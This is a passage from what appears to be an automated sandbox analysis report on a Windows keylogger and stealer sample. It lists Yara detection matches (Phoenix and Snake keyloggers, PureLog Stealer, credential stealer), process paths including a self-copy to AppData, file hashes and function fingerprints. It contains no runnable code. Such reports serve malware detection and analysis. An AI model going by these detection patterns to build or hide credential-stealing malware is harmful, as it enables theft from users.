detected Costura Assembly Loader, Source: 00000000.00000002.1288077227.0000000002AE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 00000000.00000002.1300542157.0000000006BB6000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 00000000.00000002.1290493842.0000000004026000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1300542157.0000000006441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1300542157.0000000006441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:16:59
Start date:	03/07/2024
Path:	C:\Users\user\Desktop\6Ek4nfs2y1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\6Ek4nfs2y1.exe"
Imagebase:	0xc10000
File size:	9'728 bytes
MD5 hash:	21CCB2CD9A4FBC259AB1110BC687B960
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 00000008.00000002.2507975182.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2507975182.00000000030CD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	10:17:09
Start date:	03/07/2024
Path:	C:\Users\user\AppData\Roaming\Qulzerug.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Qulzerug.exe"
Imagebase:	0x830000
File size:	9'728 bytes
MD5 hash:	21CCB2CD9A4FBC259AB1110BC687B960
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 00000009.00000002.1506650120.000000000302C000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 00000009.00000002.1552321721.00000000069BD000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.1552321721.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.1506650120.0000000002DA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 00000009.00000002.1526328229.0000000004714000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1526328229.0000000003AF8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:17:18
Start date:	03/07/2024
Path:	C:\Users\user\AppData\Roaming\Qulzerug.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Qulzerug.exe"
Imagebase:	0x2b0000
File size:	9'728 bytes
MD5 hash:	21CCB2CD9A4FBC259AB1110BC687B960
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 0000000B.00000002.1519866057.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 0000000B.00000002.1519866057.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 0000000B.00000002.1571676303.0000000006567000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.1519866057.000000000289B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.1571676303.0000000006230000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.1571676303.0000000006230000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 0000000B.00000002.1537011731.0000000003DDA000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:17:21
Start date:	03/07/2024
Path:	C:\Users\user\AppData\Roaming\Qulzerug.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Qulzerug.exe"
Imagebase:	0xe80000
File size:	9'728 bytes
MD5 hash:	21CCB2CD9A4FBC259AB1110BC687B960
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_Phoenix, Description: Phoenix/404KeyLogger keylogger payload, Source: 0000000C.00000002.2495830056.0000000000418000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 0000000C.00000002.2509279792.00000000034D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2509279792.00000000034D7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	10:17:21
Start date:	03/07/2024
Path:	C:\Users\user\AppData\Roaming\Qulzerug.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Qulzerug.exe"
Imagebase:	0xa00000
File size:	9'728 bytes
MD5 hash:	21CCB2CD9A4FBC259AB1110BC687B960
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PhoenixKeylogger, Description: Yara detected PhoenixKeylogger, Source: 0000000D.00000002.2506617896.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2506617896.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000D.00000002.2495878153.000000000040E000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	2.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 084DDA70 Relevance: .3, Instructions: 276
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43fb03ea3ac40797db6fdd3afc566b7b795a17238cf475cf1392602808c80d4c
Instruction ID: a25ea5cb5b4fa37eceb1bac61ea15cf997fa8d311d02b65dfb7e25041d882eeb
Opcode Fuzzy Hash: 43fb03ea3ac40797db6fdd3afc566b7b795a17238cf475cf1392602808c80d4c
Instruction Fuzzy Hash: FED19374E01618CFDB54DFA9D994B9DBBF2BF89300F2081AAD409AB365DB319981CF50

Function 084DEF18 Relevance: 1.6, Strings: 1, Instructions: 341
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 084DF179

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 5236f0cb1bdaabb0d686453b1ece6362a14fc269f395604bfb6801ee3507a061
Instruction ID: c65cf5e6a02942524904dbd0250f750ec5d8ce1f8cd287cdf607366375d7f41d
Opcode Fuzzy Hash: 5236f0cb1bdaabb0d686453b1ece6362a14fc269f395604bfb6801ee3507a061
Instruction Fuzzy Hash: 16D13834600705CFCB24DF29C894A6AB7F2FF89311B55C96AD85A9B361DB31F846CB90

Function 0282FEB8 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 0282FF2C

Memory Dump Source

Source File: 00000000.00000002.1288027920.0000000002820000.00000040.00000800.00020000.00000000.sdmp, Offset: 02820000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2820000_6Ek4nfs2y1.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 5942a5484762dd0452a9cb4c1daf7a111f921db2f24875f63c8f202837eeea37
Instruction ID: 2bbf5e8a080e6e7602a62f3c0a27eeb958a880dedd8b30f8852d828f44787d16
Opcode Fuzzy Hash: 5942a5484762dd0452a9cb4c1daf7a111f921db2f24875f63c8f202837eeea37
Instruction Fuzzy Hash: 061102B5D043098FDB20DFAAC480BAEFBF5AB48320F14842AD519A7600CB75A944CBA0

Function 084DF460 Relevance: .5, Instructions: 478
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b2986400211dccff811ae5d64f8989d15e9d072321214598a018aaee46fe19
Instruction ID: cea37fa1c463081834ca9f4449a8b42f265ce57eed01b456d1871a2c2f04b722
Opcode Fuzzy Hash: 08b2986400211dccff811ae5d64f8989d15e9d072321214598a018aaee46fe19
Instruction Fuzzy Hash: 79127A71A00304DFCB24DFA4D494AAEB7F2FF88701B14856EE406AB751DB36AC4ACB50

Function 00B9D030 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1287020749.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b9d000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93e8a26b29689fb97c647ddd34bf8272e304a19b86eab0193b6ffd44bf110023
Instruction ID: f372e6ed67824d4872232eb0391ce9986c70d0331ddb4c19518f30e33b13bb3e
Opcode Fuzzy Hash: 93e8a26b29689fb97c647ddd34bf8272e304a19b86eab0193b6ffd44bf110023
Instruction Fuzzy Hash: 512122B2504244DFDF15DF14D9C0B2ABBA5FB84310F24C6B9E8091B246C33AD806CAB2

Function 084DF330 Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd8d39fdbc022f225556ad573a527b4df56084a739c74b7b5df661cb2d7cdc2f
Instruction ID: c986e50df39c5ba83a0a52611dd6d9d50cdc00dec7948687e2d6856ccf0f9788
Opcode Fuzzy Hash: fd8d39fdbc022f225556ad573a527b4df56084a739c74b7b5df661cb2d7cdc2f
Instruction Fuzzy Hash: 6F212875A00209CFDB14DF94C591ADDB7F2BF88301F2041A9D405BB361DB76AD45CBA0

Function 00B9D006 Relevance: .1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1287020749.0000000000B9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b9d000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00564a16fcbaf2b1af1e8f8da8b06295611bf26ba55885669f249136e30fdece
Instruction ID: 8a6c4395af6605dfc6c76bedfd2d6028a4f4727ced753198f80227e7f22b98c0
Opcode Fuzzy Hash: 00564a16fcbaf2b1af1e8f8da8b06295611bf26ba55885669f249136e30fdece
Instruction Fuzzy Hash: 8A21517650D3C08FDB17CF20D990715BF71EB46214F2985EBD8898B6A7C339981ACB62

Function 084DDEF8 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfbdbe95ccbfe2debe87c9169154dc5ae5649dedd26e5bc9163c6e2e288cc260
Instruction ID: 10454a22874ef70fe4b81bd9fdf912989524845334bfa0eeade2e087058a4166
Opcode Fuzzy Hash: cfbdbe95ccbfe2debe87c9169154dc5ae5649dedd26e5bc9163c6e2e288cc260
Instruction Fuzzy Hash: BC11F7B4E002099FDB44EFA9C9457AEBBF1FF88700F60806A9418B7351DA749A41CF91

Function 00B8D76D Relevance: .0, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1286979882.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8d000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b7f371e2e5b745afab92c741d99eebe4e6d3716a1f05ac419079e955b557661
Instruction ID: 3cb5f38a33159fbbdf6d7859d811d1aa88d465254f8b276866218c3596deee5c
Opcode Fuzzy Hash: 9b7f371e2e5b745afab92c741d99eebe4e6d3716a1f05ac419079e955b557661
Instruction Fuzzy Hash: 7A01F7750043449BE7106A11D9C0766BBD8EF42324F18C4ABED094A1D6C2789C40CB72

Function 00B8D76C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1286979882.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b8d000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50891d081f51f8b45f3af7134f2d92030577ab6b584e336105d20c1242ef9d80
Instruction ID: de01c004adbf3bcf3e0c2aad3c44ef59f29cea9c0427d3ebca9f8c5fa723e456
Opcode Fuzzy Hash: 50891d081f51f8b45f3af7134f2d92030577ab6b584e336105d20c1242ef9d80
Instruction Fuzzy Hash: 80F0C2764053449EE7208A05D984B62FBD8EB41724F18C45AED488F696C2789C40CB71

Function 084C915F Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d460be0f45d4127079dda6dc02760e9db4218f2c1a65852b9779be69b34029c
Instruction ID: 2c186f5e64af42093b9e918bd8cd4d41daefbc8d0b0bf9b59b62acdc7d1d5e85
Opcode Fuzzy Hash: 4d460be0f45d4127079dda6dc02760e9db4218f2c1a65852b9779be69b34029c
Instruction Fuzzy Hash: C601F674A05928CFDB64EF28DD48AAAB3F5EB48702F1040EAE509A7B55DB345E81CF01

Function 084C1374 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb5298b37474ab4771ce028f79e9c87eeb6c70ccf8b943334b18e129ba9be5bd
Instruction ID: 54e7081ea445d42f12aec42acb502c1f059086f06989b1d6993d53d911479a0f
Opcode Fuzzy Hash: cb5298b37474ab4771ce028f79e9c87eeb6c70ccf8b943334b18e129ba9be5bd
Instruction Fuzzy Hash: 0501D674A00628CFCB65DF28DA88A99B7F9EB48710F5050EAD50DAB754EB346F80CF10

Function 084DE2A8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c8ff83b97163f45540e350d2aaecacd64f90e466e2e43e9389c1bb990d4e320
Instruction ID: 200040415dbba539cae5ad80b3f36259ea6dbd7aed81bfbb1dbe858a0a74b6a2
Opcode Fuzzy Hash: 9c8ff83b97163f45540e350d2aaecacd64f90e466e2e43e9389c1bb990d4e320
Instruction Fuzzy Hash: FAF01574D08248EFCB80DFA9D950AADBBF8AB49211F14C0AAE858D7341D6359A11DF90

Function 084D9418 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb9818526ebe7ce205579582ac2a28041a5dd94177f18e682f8e0d59880fe507
Instruction ID: 0fee265ad14522857b31acce3d592a96bd7593056ce683f855c364d4e0b6fe26
Opcode Fuzzy Hash: cb9818526ebe7ce205579582ac2a28041a5dd94177f18e682f8e0d59880fe507
Instruction Fuzzy Hash: CEE0C974D48208EFCB84DFA8D94069DBFF4EB48311F10C0AA984893352D6359A51DF80

Function 084C1159 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7483a7da19840c63f206fec173a737fcee1ae63c4103609e1f480917e47cbb7e
Instruction ID: 6554c4040a90f36afa505f1be7e280a67e9969f8124488ddac3531d3005a237e
Opcode Fuzzy Hash: 7483a7da19840c63f206fec173a737fcee1ae63c4103609e1f480917e47cbb7e
Instruction Fuzzy Hash: 13F03A74608529CFDB54EF28D948A8AB3F5EB4C700F1040E9A619A7795C7346F81CF11

Function 084DC560 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb9818526ebe7ce205579582ac2a28041a5dd94177f18e682f8e0d59880fe507
Instruction ID: 4139ee5621c8293333513988a25786ee802fc4f1cb8beb9efcbeec250085bfa7
Opcode Fuzzy Hash: cb9818526ebe7ce205579582ac2a28041a5dd94177f18e682f8e0d59880fe507
Instruction Fuzzy Hash: 2DE0ED74D44208EFCB84DFA8D99069DFBF4EB58300F10C1AAD81893351D6359A51DF80

Function 084D5270 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb9818526ebe7ce205579582ac2a28041a5dd94177f18e682f8e0d59880fe507
Instruction ID: 76166f5803c7980f1f179dcfd3df5d3a7db2f6dfde13173b0be5b1bbc9c5a8c1
Opcode Fuzzy Hash: cb9818526ebe7ce205579582ac2a28041a5dd94177f18e682f8e0d59880fe507
Instruction Fuzzy Hash: 9EE0C974D44208EFCB84DFA8D9406ADBBF4EB49300F10C0AA981893351DA359A55DF80

Function 084DBEB8 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb9818526ebe7ce205579582ac2a28041a5dd94177f18e682f8e0d59880fe507
Instruction ID: e941a3edad1036d03fa51be13a90612ea4f4373cac4c18d83dc5853e1539be69
Opcode Fuzzy Hash: cb9818526ebe7ce205579582ac2a28041a5dd94177f18e682f8e0d59880fe507
Instruction Fuzzy Hash: 81E0ED74D04208EFCB84DFA9D94069DFBF4EB48311F10C0AAD908A3351D7759A52DF80

Function 084DEED0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 740992dac3547d2c7847d6fb169f3ddd517269c0d345330f5b3a1628a166626f
Instruction ID: 9e8417be9ef203a0323defad0b3817a7011a7a4e8dfc89bd78a06af3137903a4
Opcode Fuzzy Hash: 740992dac3547d2c7847d6fb169f3ddd517269c0d345330f5b3a1628a166626f
Instruction Fuzzy Hash: 49E08674908208EBC744DFA5D95096DBFB8EB45301F10C0AEE84857341CA359A42DBA0

Function 084D7DC0 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e161cab6abb1c270adf59e2e06fc782b8d45d75c79075ce3e87aefeeb417b5c7
Instruction ID: 87daba93e5ee3390c41929f530e794aec8bae53c4f77505554d164c26ae32190
Opcode Fuzzy Hash: e161cab6abb1c270adf59e2e06fc782b8d45d75c79075ce3e87aefeeb417b5c7
Instruction Fuzzy Hash: 24E01234D08208EBCB44DFA8D9506ACBBF4AB88201F10C0AAC81863381DA359A02DF80

Function 084DCD98 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb7da8a6a70079f7549c20168a5ddaca7ee38c88fbe41286dfbc9438e1b8e627
Instruction ID: bf2d8cd6d52c78e23e53ac9e0df53625dd9c28b28ed24ac413a1950c63458cdd
Opcode Fuzzy Hash: eb7da8a6a70079f7549c20168a5ddaca7ee38c88fbe41286dfbc9438e1b8e627
Instruction Fuzzy Hash: ACE01234948208DBCB54DF94ED916ADBFB9EB85305F1081AFC80817355DA315E46DF81

Function 084DD148 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de9ef9979efc4b83f85d66259b226f633eafcb5c4517dfdfb59960c5cf4af8f1
Instruction ID: 339e125ecdbd71ab698238163d14ecd2d4d2afdea9fa381a6e46424e2fa3ea73
Opcode Fuzzy Hash: de9ef9979efc4b83f85d66259b226f633eafcb5c4517dfdfb59960c5cf4af8f1
Instruction Fuzzy Hash: B4C08C3048930483D5801B506A2C33A33FCC782312F442813950C013618A680060CA81

Non-executed Functions

Function 084C0006 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 398e629816dd3586e562d14805b9c6ce23cd9cd6da940cd2304af188049e162a
Instruction ID: a6902a1a29f3416a7290453784cf30535b4611035697a4bd12c70b157b7fa0cd
Opcode Fuzzy Hash: 398e629816dd3586e562d14805b9c6ce23cd9cd6da940cd2304af188049e162a
